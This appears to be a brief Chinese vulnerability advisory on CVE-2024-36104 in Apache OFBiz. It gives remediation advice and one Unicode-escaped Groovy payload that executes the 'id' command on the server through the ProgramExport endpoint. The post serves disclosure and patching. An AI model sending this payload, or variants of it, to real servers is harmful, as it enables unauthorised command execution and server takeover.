Apache OFBiz 目录遍历致代码执行漏洞（CVE-2024-36104）

柠檬赏金猎人 2024-06-18 22:54

Apache OFBiz是一个电子商务平台，用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。

2024年5月，官方发布新版本修复了Apache OFBiz 目录遍历致代码执行漏洞，攻击者可构造恶意请求控制服务器。建议尽快修复漏洞。

---

unicode格式

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

---

修复方案****

1、禁止对 /webtools/control/ProgramExport路径访问

2、升级至最新版本

仅限交流学习使用，如您在使用本工具或代码的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。
“如侵权请私聊公众号删文”。